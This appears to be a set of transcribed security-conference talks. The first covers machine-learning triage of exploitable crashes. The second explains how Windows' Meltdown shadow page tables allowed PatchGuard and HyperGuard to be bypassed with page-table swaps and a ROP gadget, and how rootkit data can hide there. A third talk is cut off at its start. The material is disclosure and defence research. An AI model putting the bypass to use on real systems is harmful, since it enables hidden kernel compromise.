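print(f"always-guess-exploitable accuracy: {baseline:.1%}")

# The seductive rule read off the decision tree: "EBP not in bin 1 and
# ESP not in bin 2 means exploitable". It fits these samples, but the
# model never saw a non-exploitable crash, so the rule says more about
# the data set than about exploitability.
def rule_of_thumb(crash):
    """crash maps register name -> bin index (binning scheme assumed)."""
    return crash["EBP"] != 1 and crash["ESP"] != 2

print(rule_of_thumb({"EBP": 3, "ESP": 1}))  # flagged exploitable
print(rule_of_thumb({"EBP": 1, "ESP": 2}))  # not flagged
```

Any reported accuracy should be read against that 96% floor; a model only demonstrates learning if it beats the trivial majority guess.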

It's very good at matching different variables together and finding correlations between them. And it's also very good at misleading us into interpreting the wrong results. So you have to be very careful when you do that. But if you are careful, you can get good results. I'm not dissing machine learning. I'm just saying: use it with caution. In the end, we don't have enough non-exploitable crashes to fully train our model, which is, as we've said in the beginning, the biggest problem: getting good data. And this is the biggest problem for anyone playing in the data science field, which is also the reason why the biggest players are the people who

have access to lots of data, such as Facebook, Google, Amazon. Anyone else who has access to huge amounts of data will have the best machine learning model. Imagine that it actually worked, and it was open sourced, and you could use it, and it would fit any kind of problem in the world. What could you use this for? So we thought about three main use cases, out of which one was very interesting to us, but we think the others might be interesting for you. So the first one would be: imagine that you had a system that would look at a crash and tell you if it's exploitable or not, with a high degree of confidence. That means if you hook it up into your favorite bug tracker, you can very

easily talk to your developers and say, reprioritize your bugs, because these bugs are exploitable and these bugs are not. And it's a new way to look at bug prioritization, at least from a security perspective. Because if we could fix all of the exploitable bugs first, our attack surface would be closed much faster. The second area, which was very interesting for us, is for vulnerability hunters. Take those 10,000 crashes, throw 9,900 of them in the garbage, and 100 remain; just look at those 100. It's much better for a vulnerability hunter to focus their attention somewhere with a bigger expectation of actually having some yield. And the last opportunity is actually to improve fuzzers. The basic

job of a fuzzer is to find some sort of input that will crash the program. But a smart fuzzer will not just crash the program; it will crash the program and give you those inputs that produce crashes you can actually use for something. Because if it just crashes the program and nothing happens and you can't use it for anything, it's not an interesting crash. Okay? So, to wrap this up. Even though data science has the word science in its name, it's more an art than a science. Talk to anyone with a PhD in the field, and they will agree with me. And in the end, we can learn a lot

and we can use a lot from other disciplines. So we had a data scientist on our team, and that helped us look at those data problems from a new perspective, from a new angle that we hadn't considered before. And it actually led us onto this path, to find out that we can improve the way that we look at things. We can improve the way that we are doing our day-to-day jobs and save money and save time and resources. So we would like to acknowledge Dennis, the PhD on my previous team, who did this work on the machine learning side, and both Ezra and myself on the binary exploitation side of the matter. The people behind the exploitable open source package, which is amazing, and

if you're in the field, you're probably already aware of it. And the people behind the Cyber Grand Challenge, because obviously, without that data set, we wouldn't be here today. So, thank you to all of them, and thank you all. And we have time for questions. Please, don't be shy. They don't have questions, they are running away. Yeah? - Are we at a point where SOC analysts, or those aspiring to be a SOC analyst, should actually become data scientists? - The question was... you probably all heard it through the microphone. It's a tough question. A data scientist is usually someone who has a very deep familiarity with the algorithmic side of machine learning.

When you're in a SOC, you're not interested in the performance of the algorithm or in developing new algorithms. You're actually interested in applying those algorithms. So I would say someone in a SOC doesn't need to be a data scientist, but they should be a data analyst at least. And that means, at a minimum, knowing how to run queries in some query language, SQL, whatever you can imagine. It will make you a better analyst. But also, understanding the way the data is structured will help improve your queries, and that means you're already on the path to being a data analyst. Yeah, more questions please. No, behind him. Thank you. - Basically, because most of the techniques you've used actually do keep the

interpretability of the features they found important. Is that one of the things that you actually took away from that whole process, to maybe develop further techniques of detecting exploitable crashes? - Yeah. So we looked at it and we tried to find out... Well, let me rephrase this and maybe answer the same question, I hope. Looking at all of the crashes that we looked at and the machine learning models that we developed, it looked like some of the pieces of information, the features that we look at, have a higher probability of telling whether something is exploitable or not. So this is part of the reason that we did this research, because instead of looking at all the data that we can look at in a crash, if

we could just focus on a specific slice of data from that crash, it would make our job easier. So the shorter answer is yes, you can. The longer answer: no, it doesn't hold up in the real world. And the reason for that is that the machine learning models that we trained gave us information about the information that they saw. So they were very good at focusing your attention, with results that are relevant for these 632 test cases. But once we took those same models and fed them something new that they'd never seen before, it would skew. However, if we had, like, 1 million test cases covering real world use cases, we could probably have

better insight and we'd get a different focus. And that focus would probably be more true for a broader set of cases. Let me expand a little bit on this. There's a second important thing here. In this particular kind of machine learning, we are not so concerned about misclassification, because our objective is to find exploitable bugs and we have the assumption that there are multiple of them. So if we miss one of them, it's not as bad as in traditional defensive machine learning. Does it make sense? - Do you have any ideas about how to expand your data set? Or maybe crowdsourcing something from people who are vulnerability researchers, something like that? - So we have some ideas, and we actually do

ask, every time we give a talk like this, if people have information, please share it with us. The problem is that most of the people that have that information cannot share it with other people. So if we talk to a large vendor, I don't know, SentinelOne, Cylance, Carbon Black, whoever, who have access to those data points, they can't share those data points with us, from a legal perspective, a business perspective, and others. So even though it's floating out there, you usually can't really touch it. It's part of the problem of getting good data. So if someone has a very brilliant idea of how to go about that, we would love to hear it. That's really the

reason why we are sharing our methodology. You are probably smarter than us and have more resources than us. Somebody in the audience will get it, build from this, and make something way better. - It looks like you were mainly doing memory register fuzzing. What libraries and modules were you using to do that? - For the fuzzing, which libraries and modules did you use for the memory fuzzing? Well, we were using AFL. Maybe I'll explain, for a different... we didn't do specifically memory fuzzing. What we've done is use AFL to find a crash. When we found the crash, we configured the Linux backend to save the crash dump. And then we had a Python script running, analyzing the crash dump and extracting the information that we cared about.
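A minimal sketch of that last step, extracting register values from a crash dump and reducing them to bins; the dump format and the bin boundaries here are invented, since the talk doesn't show the real script:

```python
# Sketch of the post-AFL step described above: pull register values out
# of a crash dump and reduce them to coarse bins for the model. The dump
# format and bin edges are invented for illustration.
import re

DUMP = """\
eax=00000000 ebx=41414141 ecx=0012ff7c
edx=7c90e514 esi=41414141 edi=00000000
eip=41414141 esp=0012ff5c ebp=41414141
"""

BIN_EDGES = [0x1000, 0x80000000, 0xC0000000]  # hypothetical boundaries

def bin_value(value):
    """1-based bin index: values between two edges share a bin."""
    for i, edge in enumerate(BIN_EDGES):
        if value < edge:
            return i + 1
    return len(BIN_EDGES) + 1

registers = {m[0]: int(m[1], 16)
             for m in re.findall(r"(\w{3})=([0-9a-f]{8})", DUMP)}
features = {name: bin_value(val) for name, val in registers.items()}
print(features["eip"], features["eax"])  # binned, not raw, values
```

The binning matters because, as mentioned in the Q&A later, the model never sees raw register values, only which range each one falls into.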

At this point, we cared about registers. But we actually had a trove of information to look at, which we didn't. We just looked at the registers because that's the decision that we've made. It's not a necessity. So my question is this. So in the data science world, they're always talking about how much data do you need to actually create a viable model. And he talked about the-- and you've talked about the limitations of the data set you can get. How much data do you need to get a viable model? It's actually a big open question, the relationship between the amount of data that you need versus the accuracy of the model that you're trying to build. So there is a graph, which I can't show because I

don't have it here, but it looks something like this: it's a nonlinear graph. In the beginning, when you're building your model, you need high-accuracy data, and less of it. As your accuracy increases, when you're fine-tuning your model, you will need more data. And as you increase the amount of data, your accuracy gains will drop, but the model will be more robust. So there is a cutoff point where you give it more data, you don't get much improvement in your accuracy, and you're just wasting time and resources. But most of the problem is getting to that point. And if someone already

has more data than that point, usually they don't care about the question. They just have lots of data. For everyone else, if you can get to, let's say, a 60% accurate model with a fixed amount of data, and in order to get to 70% accuracy you'd have to double the amount of data, you will usually stop, because getting data is very expensive. - So this might be for the room as well. There's a group, I think they're called Language Theoretic... does that sound familiar? Mindset. Langsec, yeah. So those guys. If I'm remembering right, they've done some research on classes of bugs. Basically: I'll write an input parser for random input, it'll be bad, and that's where a large class of problems

come from. If you start out and build a solid finite state machine that recognizes good input and bad input and all of that... So they may have some good information on non-exploitable, good parsers. - Thank you, first of all. The second thing is that I agree, but there's a caveat to that. And that is that when we are discussing inputs to the machine, we don't necessarily mean something that gets parsed by a parser. Inputs come in various forms. And it kind of hides, because it's not obvious when we say inputs. An input, for example, is the way that the stack is structured before you call a function. It's an input to that function. However, it's not something that's user controllable in a way. So it's not like you

entered your name in a text field and then a bug occurred and a crash happened. Sometimes it happens because you reordered the parameters, or you gave the wrong length of a parameter, or something like that, which would cause the crash, but not necessarily something that a parser even gets to look at through that exploitation path. So I fully agree that better sanitization will give better security. That is... of course. However, I'm not sure how deep the bugs are that this kind of approach will actually find or stop. I agree; I'm just saying that the problem is larger than that. - Yeah. So one of my questions was: you had this three stage validation thing where you were checking the contents of the pointer, the index, and then the contents of

the ECX register, I believe. Now, are you actually checking what's in the actual region of memory, to validate that it's the same data overflowing the same section of memory? Or is it that you're looking at the debug logs that you were talking about? - The answer to that is yes and no. We are looking at the specific values in the sense that we are analyzing them to read them, but we don't care about the exact values, and we are binning them, meaning that if they are between range A and B, they all belong to bin 1. So we don't care about the values. The other thing is that we are not looking at the crash logs. We are

actually looking at the memory dump. So we get the actual register values. So this is the information that the model is basing its decisions on. Yeah. Any more questions, please? It's just you between us and the happy hour. - So I don't remember the presentation I saw it in, but I think someone hypothesized that AI is better at defending, as opposed to adversarial types of tasks, and you were looking at exploitables. Do you agree with that hypothesis? - I'll have to look at the formulation of that hypothesis to either agree or disagree. I would say that we have some experience with the adversarial side of machine learning. We actually gave a talk right here in this room last

year about that. There's some stuff that machine learning is better at. There's some stuff that it's horrendously bad at. Adversarial analysis, for example, is something that machine learning is very bad at, just for the reason that the problem space is so much larger than the solution space. There are so many different inputs that could lead to the same output for machine learning. And that means that you can easily trick machine learning into misclassifying an input, making the wrong decisions, etc. However, in that sense, machine learning is much better at defending, because if, as a defender, you can create a whitelisting set of rules and

you can teach the machine learning those rules, it would be much better than you enforcing those rules on a specific data set. However, that's not the way that it's usually applied. Maybe some security products do pattern matching, trying to do anomaly detection, stuff like that. Machine learning is much better than humans at that, but it's still not very good; it's not the same thing. Because we need to remember, as we've said multiple times: machine learning is only as good as the experience it has. And for defending, it will only be able to defend against what it has seen, not new kinds of stuff. Just to give you an example, to give you a rule of thumb here: does someone know how often Facebook updates its machine learning models? How often? So the answer to that is that

they reanalyze their data and update the parameters for their models on a cadence of a couple of hours. So they re-teach the machine learning models that they have every couple of hours, based on the new data that they received from the users. And that means that they have a moving-target machine learning model. Because if they kept the same machine learning model, it would drift away from what the users are doing very, very fast. Which is another problem with machine learning, which we haven't discussed here at all, but it kind of answers that problem. Yeah. Thank you all. If you have any more questions, we're going to stay right here. Thank you. Thank you.


Okay, hi everyone. We're happy to be here. So today we're going to discuss research that we did shortly after the Meltdown vulnerability was published. Basically, what we did is examine the patches that were made, and we noticed that while they do mitigate Meltdown, they also open the door for bypasses of some other security protections, and we'll go through that today. So with me is Omri Misgav, the security research team leader at enSilo and also a past speaker at multiple BSides conferences. And I'm Udi, CTO and co-founder of enSilo; I've also spoken at BSides several times, and at Black Hat before. Okay, so just to outline the presentation, we'll start with a short introduction on speculative execution. We won't dive too much into the details. Then we'll

talk about the kernel virtual address space shadow and its internals, what it is exactly, how it enabled us to bypass some security mitigations and protections; we'll talk about the fixes that were made, and also other stuff you can do with it. Okay, so as a quick intro, most processors have a rather rich instruction set, and each instruction is composed of micro-instructions, or micro-operations. Those micro-operations are what the processor actually executes, and you can also see it in Intel's manuals when you look into how each instruction is implemented: the breakdown of the micro-operations that are executed when an instruction is executed. So, about speculative execution. The idea is that in order to improve performance, the processor can try to execute instructions ahead of time

by guessing which branch is going to be taken or which instructions are going to be executed. So for example, if we have a conditional branch instruction, the CPU will try to guess which instructions will be executed, and then execute micro-operations ahead of time. Now, obviously the processor can be wrong and choose the wrong branch to execute. In those cases, the actions that were done as part of the execution will be discarded. We will call these transient instructions for this presentation. Now, while the state of the processor or the registers will not change if something like that happened, it will still have an effect, or at least this is the cause of Meltdown, on the general state of the

machine, by actually putting pages in the cache. So Meltdown was, and still is, a processor level vulnerability, and the vulnerability was that it allowed user mode code, even totally unprivileged user mode code, to read the entire memory in a rather effective way, including kernel memory, although it's not supposed to be authorized to access it. At the time it affected Intel CPUs and, based on publications, IBM POWER and some ARM processors. And the idea was to leverage a side channel that was created by the CPU's memory cache. So if we take a look at the snippet below on the right hand side, let's say that the RCX register points to some kernel address that's not supposed to be accessible. When it's broken down to the micro-operations, the CPU

may still fetch that address, and before it actually throws the exception, it will try to execute the other operations. Now, if we look at the operations below, the last line: in case it executes this micro-operation, it may put in the cache one of the pages that were prepared ahead of time by the attacker, in order to learn what data was at the kernel address. And by checking the time it takes to access each page, it is possible to know which page exactly was accessed, and from that, to know what the data in the kernel was. Now, I know that's a very high level explanation. To dive into the details, you can go to the address below. But it should pretty much--

and get us aligned on what happens exactly. So before diving into the mitigation, I'll just give a really short overview of the virtual memory layout. So on 64-bit, we have a page table that looks something like this. The physical base address of the page table is found in CR3, and the first level is the PML4; we'll discuss it more specifically in the rest of the presentation. And after you break down the virtual address and go through each part of the page tables, you eventually get to what is known as the PTE. The PTE contains not only the physical address, but also other bits that define the protection on the page, such as whether it's executable or not, whether it's user mode or kernel

space, writable or not, and so on. One other thing to note is that there is a field called the page frame number, which is used to get to the actual physical address. We'll use PFN in the presentation to refer to physical addresses. Okay. So the solution, at a high level, was quite simple. The classic model of the operating system was to map the entire memory space in a single page table, both when user mode code is running and when kernel mode code is running, like on the left hand side. Now, after Meltdown, the idea is to remove most of the kernel space mappings and only map the user portion of the memory. And so, even if something like Meltdown occurs, the

pages are not mapped, they are not there, and so there won't be any leak. More specifically, to implement that, there are now two page tables. One still has access to the entire address space, and it is used when kernel mode code is executing; you can see all the drivers on the left hand side. And on the right hand side there is what's called the shadow page table, which contains all the user mode code and the code that is used for transitions between kernel and user mode. And now Omri will dive into the details of how it is implemented. - Okay. So we have two page tables now. It means that every time we transition from user space into kernel space, we have a new context switch,

only for the memory of the same process. Both tables, as we mentioned: the kernel page table, which is the full address space page table, and the user shadow page table; those are terms that we're going to use later on in the presentation. Also, there are variations of this mitigation on Linux and Mac, but we won't dive into their internals, though they are quite similar. So the basic design, now that we have only a portion of the kernel mapped into the two tables, means that we have to put all the code for the transitions in one single place, so it will be easier to map it in the two different page tables. Now, all the code for the transitions, all the routines that handle

entering and exiting the kernel are found in a PE section that is named KVASCODE, as you can see in the slide. Every transition routine now has two versions: the shadow one, which is present in that section, and the regular one, which is present in the .text section, the regular code section, in case you have a newer CPU that is not vulnerable to this attack. Now, every transition routine's second version, the one that accesses the shadow page table, has the suffix Shadow added to its name, as you can see. And basically all this function does is check whether or not the shadow page table is currently being used, and if so, on the transition to the kernel, it switches it back to

the kernel page table, so operation can continue regularly, as it was before. And the exit functions, the exit functions from the kernel, are also present in that same code section. So when we transition from ring three, from user space, into kernel mode, the CPU saves some data on the stack so the transition can occur properly, and the OS can later use this data. Usually it's named the machine frame, which is part of the larger trap frame that the OS builds. Previously, without the mitigation, the transition worked like this: in user mode, the thread has its own stack, and when transitioning to the kernel, the same thread had a different stack in

the kernel space. Now, in order to simplify things, instead of that, we first get a transition stack. This stack is the one that is used directly when we start executing in ring zero; it is used in the shadow functions that we mentioned in the previous slide, which will also switch the stack to the thread's kernel stack. Now, this transition stack is not per thread but per CPU, per processor, per core if you want. Each virtual address points to the same physical address in both page tables of the same process. And because of that, this means that the code section for the transitions, the KVASCODE section, is placed in

the same virtual address, so we can still use Meltdown to break KASLR. This is not something that was meant to be handled by the mitigation, and it's some sort of compromise by Microsoft. The way the page tables are kept in sync is actually by just copying the user-space PML4 entries from the full page table to the shadow one, so you only have to keep a very small part synchronized, and it's easier to do. It's very similar to how the kernel has been shared between different processes up until now. So this memory context switch introduces a pretty big performance issue. There were reports back at the time that

it cost a penalty of up to 30%, if I remember correctly. And in order to minimize the impact, some optimizations were made. The first one utilizes the hardware: PCID is a mechanism that is available on newer Intel processors, and it basically means that the software, in this case the operating system, can provide a logical tag for a memory address space. So when cache entries are built by the processor, it knows to append this tag to them, and then, when you operate in a specific context, it knows to use just the relevant entries in the cache. Microsoft decided to use two IDs: one for the user

address space for all processes, and the second one for the kernel address space. And if you have an older CPU that doesn't support this mechanism, the next optimization is meant to help with that. Basically, in the PTE there is a flag that marks a page as global, meaning it won't necessarily be flushed on every change of the CR3 register. Up until now the kernel pages were marked global, but that was switched: the global bit is now set on the user address-space PTEs. So now, every time we transition into the kernel and switch the page table, the user space won't be flushed out of the cache, and we save some performance there. And the last

large optimization that was made is that elevated processes, administrative processes, don't have this kind of shadow applied to them. So even if your machine is vulnerable, those processes don't have these mechanisms applied to them. This is because they can gain access to the kernel in other ways: because they are privileged, they can just load their own driver to read and write the kernel address space. So there isn't really any benefit in shadowing those processes as well. So, when the system starts, the initialization process is quite short regarding the mitigation. We start with the regular interrupt handlers, and then we get into the function that

checks if the actual mitigation should be applied; its name is KiEnableKvaShadowing. Once it finds that the mitigation needs to be applied, it changes the interrupt handlers to their shadow versions in the code section we mentioned earlier. Then, if it can, it opts in to PCID if the hardware supports it, and sets the global flag KiKvaShadow to indicate that the mitigation is active. Once this function is done, the MSRs for the system calls are set properly, to the version of the function that we need, according to the global flag. There are some kernel structures worth mentioning that had changes and additions made to them. We start with the EPROCESS structure; it

basically represents a process in the kernel. There are three fields that were added to it: the user directory table base, which is the base address of the shadow page table; the address policy, which is a flag that indicates whether or not the current process is opted in to the mitigation; and the shadow mapping, which is the virtual address that corresponds to the user directory table base. And for the KPCR, some fields were added in order to enable the transitions. Those fields are aligned and padded into a single page, so only that page from the entire structure is mapped into the shadow page table, and no other data will leak. The kernel directory table base is the physical address of the

full page table, which we swap in at the shadow entry point. The RSP base shadow is the thread's kernel-mode stack pointer. The user RSP shadow is the place we use to save the current user-mode stack pointer. And the shadow flag indicates whether or not this mitigation actually applies to the current running thread. So the last thing we're going to talk about, to wrap up the internals part of the talk, is how a process is created. It kind of surprised us when we saw it, but when the mitigation is enabled on the machine, every process starts out with a shadow page table. Even before it executes, when it's being created, it's created with a proper shadow

page table. But because of the optimization we mentioned, when privileged processes start executing, meaning when the first thread actually starts running, the system will go ahead and remove the shadow page table. So now we get to the more interesting part. We talked a bit about the internals and how the mitigation works. Now let's talk about the security mechanisms that could be affected by it. We start with PatchGuard, which is a pretty old mechanism. It's opportunistic in nature: it tries to protect the kernel by running every once in a while and checking the contents of certain elements, such as hashes of code pages, values in the SSDT or IDT, or values of MSRs. And if it detects

some anomaly, it will crash the machine. HyperGuard, which is a bit newer, is deterministic in nature. It is hardware dependent, though; it's not just software. It relies on the hardware and on a hypervisor being enabled, and it provides services not only for the kernel itself but also for the hypervisor. Its method of working is a bit different: it verifies actions. It doesn't check content post-action; because it's part of the hypervisor, it can opt in to certain events that cause VM exits and things like that. So when write operations occur, it can validate them immediately; when an attempt to execute code happens, it can validate it immediately; and so on. So how can we bypass them? If

we think about it, the limitations they present are that we can't change any pages in the kernel, because PatchGuard will catch us, and we can't really change the values of MSRs, because HyperGuard will catch us much faster than PatchGuard would. But if you think about it, what we have now is a new area in ring 0 that runs code but doesn't have the kernel mapped. So, odds are, it also doesn't have PatchGuard. So if we can figure out a way to grab hold of this area, we'll be able to bypass those protections. And apparently we can do it pretty easily. All we have to do is make the pages in the shadow page table private to it and separate them

between the full page table and the shadow page table. And now we own those pages and can do pretty much whatever we like with them. So, what can we actually do, and how can we achieve the bypass in practice? First we have to locate that code section in order to switch it. It's pretty easy: we can just parse the PE section table, and then allocate new pages for us to use. Now we need to build our own hook, and it's a bit different this time. First, if you remember, what the shadow entry point does is check whether it's currently in the context of the shadow page table and switch it. Now this check is quite redundant: we know

for sure that we are in the context of the shadow page table, since those pages are owned by us and are private to that page table. So we can just remove it; we don't need it anymore. And now we need to actually be able to run our own code. If we try to run it in the shadow page table, it's possible, but we'll have some issues. We can't really use any functionality that the OS provides. We also won't have the rest of the data in the kernel space there, because that's the whole point of the shadow page table: it's a filtered, reduced view of the kernel itself. And another issue that will

be a bit more problematic later on, and that pretty much sealed the deal for us, is the fact that we'd have to handle relocations ourselves. We don't use the OS loader here; we place the code ourselves, so we'd have to apply relocations ourselves too. So that's pretty much not a valid option for us. But what if we could actually go back into the kernel page table, but to our own code, before we get to the kernel's code? We still facilitate the memory context switch, but we use a ROP gadget beforehand to make sure we land in our own code. So let's say we take a look at the binary of the shared code section; that's

the original one. If we move to the disassembler view, we can look for that instruction opcode, which is the last byte in the snippet. Looking at it through the disassembler, we can see the start of the original shadow entry point that we copied into those pages, and that will also be the content of the page after we switch back to the full page table. Now, instead, we can overwrite it with a basic ROP gadget that we built: we push the address of our driver in the full page table, then facilitate the memory context switch by assigning the proper value to the CR3 register, and using the

same RET instruction that will be present in both views, as you can see. And the last thing we have to take care of is switching the stack: we finish with the transition stack and go back to the thread's kernel stack, and from there we are much freer to do what we want. Applying the hook is also very simple. All we need to do is parse the page tables and change the PFNs. That way we avoid any dangerous write operations that those mechanisms can monitor, and that's how we can pretty much avoid them completely. Those page tables are accessed through physical addresses, so we can just do what forensics tools do in order to get to them: either

use the physical memory device, or do page-table remapping on our own. We decided to go with page-table remapping because we thought there was less chance of being detected that way. Once we get to our code in the full page table, the one last thing we have to do before we are pretty much completely free is to flush the hooked pages' virtual addresses from the cache. That way we avoid any recursion: because there is no longer any check of what the current memory context is, the hook could just call itself over and over again if it's not flushed out. And because we control the entire page, the same way we control the entry, we can also control the

exit. HVCI is another security mechanism. It's a bit outside the scope of what we aimed to bypass, but it did present some challenges for implementing this technique. We can no longer create our own pages at runtime, because HVCI actually prevents that, and we can't modify existing pages either. Basically it means that we have to rely more on data pages, which is not a big deal; there is enough space to map data pages into the shadow page table near the shadow entry points. And our code needs to be position independent; then we can compile it in advance and there won't be any issue. Our ROP gadget will look something

similar to this. We need to get the code address, then use the data page that we set up when we installed the hook in order to fetch the address of the driver hook, and we're pretty much free from there. So, if you've followed so far: up until now we managed to bypass the protections that we wanted, we bypassed PatchGuard, we bypassed HyperGuard, but we still had one issue, and it's not that small, it's quite big: we can only apply these hooks to, and control, less privileged processes. And if we're honest, those are usually not of great interest to defenders or attackers. Usually we're more interested in the privileged processes, which don't have this shadow applied to

them, so the hook doesn't apply to them either. So we tried to understand whether it was actually possible to somehow force them into the mitigation and be able to control them as well. And we did manage to pull something off. We start with a newly created process. If you remember, when a process is created, it does have a shadow page table. So if we can find a way to prevent it from being deleted, maybe we can just use it later on. The code that manages the deletion of the shadow page table does one interesting check in its prologue. You can see on the lower right side that it checks the

shadow mapping field value to see if it's null. If so, it just skips the entire function and won't clean up those resources. So we monitor the creation of the process, which we do anyway, save those field values, and reset them. Once the process has actually started running, we can opt it back in by resynchronizing the PTEs of the user space and restoring the values. Then all we have to do is resynchronize the state of the KPCR fields, which is very simple to do: we just trigger a memory context switch by attaching to a different process and returning to our own. And for cleanup we don't really need to do anything; the system takes care of

it for us as well, since it is the one that allocated all the pages and all the page tables, so there is no issue here. Now we get into the more experimental area. Converting a running privileged process is a bit more trouble, because the shadow page table was already deleted; we didn't prevent it from being deleted, so we have to figure something out. But apparently it's not that complicated either. We allocate a new page on our own, then suspend the process so it won't run while we do some memory operations, and we resynchronize the shadow page table PML4 that we allocated. Again, we use the same synchronization for the user space. But since we allocated the page

table, we also need to synchronize the kernel space for the shadow page table, which is pretty easy: we can just use the entries from the System process. We opt the process in again, setting the fields to what we expect them to be when the mitigation is enabled, and then we let it continue. The difference here is that on termination we need to opt the process back out and free the page on our own; otherwise the system will crash, because it will try to free resources that it didn't allocate. Okay, so far we discussed how the mitigation enabled us to bypass PatchGuard, HyperGuard, and such mechanisms. Now, the fix that we recommended at the time was rather

simple, and it was also what was eventually done. Basically, the only check that needs to be added to PatchGuard is to validate that the physical pages in the shadow page table match the physical pages in the full kernel page table for those regions that are used for transitions. Then, indirectly, PatchGuard validates the shadow pages while it validates the full kernel pages: the first check makes sure that the physical address is the same, so it's the same memory, and then the validation that the code didn't change makes sure that it's actually the original code. However, there is a single complication: this needs to be done for every process that is currently running; otherwise it is still possible to hijack specific processes and

take over them. And this is exactly what it does: it goes through all the running processes and makes sure that the physical pages match for those transition areas. This was fixed in Redstone 5, Insider build 17655, and from then on it was no longer possible to perform those kinds of hijacks. However, this test only checks that the specific code that is used for a transition is not tampered with. It is still possible to put code in the shadow page tables, execute kernel code there, put data there, and most security products don't look at that space at all. Even forensics tools normally will not look at those pages. So it is possible to put parts of rootkits there and hide data there and so

on. So one possibility is to just improve PatchGuard so it will validate that those pages are empty, that a page contains only the transition code it's supposed to contain. It also makes sense to add plugins to tools like Volatility and Rekall to scan those pages as well. Basically, any code or any data in this page table that is not part of the transition code is suspicious and should not be there. And some final notes. As we all know, Meltdown and Spectre had a lot of impact; they changed a lot about the way we view hardware protections and things like that. And the PatchGuard bypass that we found was not

the only issue. There was actually a very significant issue in Windows 7, called Total Meltdown, which was even much worse than Meltdown itself. By mistake, the page table of the Windows 7 kernel was accessible to user mode, and, well, this pretty much means that you can do whatever you want on the system. This was also patched shortly after it was discovered. The point is that when making such big changes, you should probably review as much as possible, even things that are not directly related to the architectural change. Also, it's probably smart to take the shadow page tables into account when doing forensics and things like that, because

as of today, it is still possible to hide stuff over there. Okay, we're pretty much done. Questions? Are virtual cores treated the same? Are they as vulnerable, and mitigated in the same way, as physical cores? Any other questions? Hi, thank you for the presentation. So the version that you said the fix is in, is that out yet? That's still an Insider preview, right? So basically the production version of Windows is still vulnerable to this? No, it's already applied to the production version. It was applied to an Insider build and later to the production version. There was another vulnerability announced today that uses SWAPGS. It's related to Spectre, so another Intel vulnerability that was patched today, and it uses the

SWAPGS instruction to basically bypass all the previous mitigations for Spectre and Meltdown, including KPTI and all that. And the question would be: apparently Microsoft did some silent patching back in July, and only today they released the advisory for it, because this was the disclosure date. Have you had time to look into that? Or do you plan to look at the mitigations for that? Because there are some new mitigations there. We did not review it yet. And yes, we will, but we didn't have time to do it yet. Okay. Thank you.

Anyone else? All right. Thank you so much. Thank you. Actually, it was already out there, you know, with all the people, and then they realized that this is a zero-day, so they had to pull it back, and now they're not... Yes. I think it has something to do with serializing SWAPGS. Yeah.
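The core of the hijack described in this talk, and the per-process PatchGuard check that eventually closed it, can be sketched as a toy Python model. Everything here is a simplified stand-in: real page tables are four-level hardware structures, the PFN values are arbitrary, and PatchGuard's actual checks are far more involved.

```python
# Toy model of KVA Shadow: each process has a full kernel page table and a
# reduced "shadow" table used while user-mode code runs. The transition
# (KVASCODE) pages must map to the *same* physical frames (PFNs) in both
# tables. All names and numbers are illustrative, not real Windows data.

TRANSITION_VAS = [0xFFFFF000]  # virtual page(s) holding the transition code

def make_process(kernel_pfns, user_pfns):
    """Build the two per-process tables; transition pages are shared."""
    kernel_table = dict(kernel_pfns)
    shadow_table = dict(user_pfns)
    for va in TRANSITION_VAS:          # same PFN in both views
        shadow_table[va] = kernel_table[va]
    return {"kernel": kernel_table, "shadow": shadow_table}

def hijack(proc, attacker_pfn):
    """The talk's technique: make the shadow copy of the transition page
    private, so writes to it are invisible to PatchGuard's hash checks
    of the kernel-side pages."""
    for va in TRANSITION_VAS:
        proc["shadow"][va] = attacker_pfn

def patchguard_fix_check(processes):
    """The Redstone 5 fix: for every running process, the transition pages
    must resolve to identical PFNs in both tables."""
    for proc in processes:
        for va in TRANSITION_VAS:
            if proc["shadow"][va] != proc["kernel"][va]:
                return False           # tampering detected -> bugcheck
    return True

procs = [make_process({0xFFFFF000: 100, 0xFFFFE000: 101}, {0x00001000: 200})]
assert patchguard_fix_check(procs)      # clean system passes
hijack(procs[0], attacker_pfn=999)
assert not patchguard_fix_check(procs)  # per-process check catches the hijack
```

Note that the check has to walk every process, exactly as the speakers said: a single global comparison would miss a hijack applied to one process's shadow table.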

-
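The synchronization scheme described in the talk, copying only the user-space half of the top-level PML4 entries from the full table into the shadow table, can also be sketched in Python. The dict-based "tables" and tuple entries are simplified stand-ins; on x86-64 the PML4 really does have 512 entries, with the low half covering user space.

```python
# Toy sketch of shadow-table synchronization: only the user-space half of
# the top-level PML4 entries is copied from the full table, so just that
# small top level needs to be kept in sync. Entries are illustrative tuples,
# not real page-table entries.

USER_HALF = range(0, 256)   # low PML4 slots cover user space on x86-64

def sync_shadow_pml4(full_pml4, shadow_pml4):
    """Copy the user-space PML4 entries from the full table to the shadow."""
    for i in USER_HALF:
        shadow_pml4[i] = full_pml4[i]

full = {i: ("user", i) for i in range(0, 256)}
full.update({i: ("kernel", i) for i in range(256, 512)})
shadow = {i: None for i in range(512)}

sync_shadow_pml4(full, shadow)
assert shadow[0] == ("user", 0)   # user half mirrored into the shadow table
assert shadow[300] is None        # kernel half stays unmapped in the shadow
```

This mirrors the point made in the talk: because only the top level is shared, the scheme looks a lot like how the kernel half of the address space was already shared between processes before the mitigation.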

Hello, everyone. Welcome. A few announcements before we get started. First off, I'd like to thank our sponsors, particularly our Inner Circle sponsors, Critical Stack and Valimail, as well as some of our stellar sponsors, Amazon, BlackBerry, and Cylance. We have a huge number of sponsors this year, and we really could not do this conference without them. They're part of what makes this possible. So please go out there, see some sponsors, thank them. Please silence your cell phones. At the end, if there are questions, I will be walking around with a microphone. Make sure to speak your question into that microphone so the people

at home can hear you. And that's all the announcements I have. So without further ado, here are Ben Sawyer and Matt Canham. - Hi, thank you very much. Before we start, I just want to say that whatever we say today is not the opinion or position of the US Army, so don't hold them responsible. Hi, I am Dr. Ben Sawyer, and this is Dr. Matt Canham. We're with the Laboratory for Autonomy-Brain Exchange at the University of Central Florida. And today we'd like to have you look at a problem that we've been looking at for some time. We're here, actually, to enlist the opinion and the help of this community in continuing and identifying the direction of our

research. Today we'll be talking about InfoSec as it relates to brain-machine interfaces in the very near future, and in fact the present. So LabX, the Laboratory for Autonomy-Brain Exchange, is a group that really looks to engineer systems that optimize data flow between humans and machines. Basically, get away from the slowest possible thing, which is poking a screen with this chunk of meat, and get to anything faster or better. We do that through neuroengineering, which basically means hooking up computers to the brain, or to pieces that touch the brain, and using that to move things faster than fingers can. Neuroergonomics, which means watching people as they use tools and understanding their brain state as a way of re-engineering and redesigning, for example, interfaces. And neuromodulation, which is

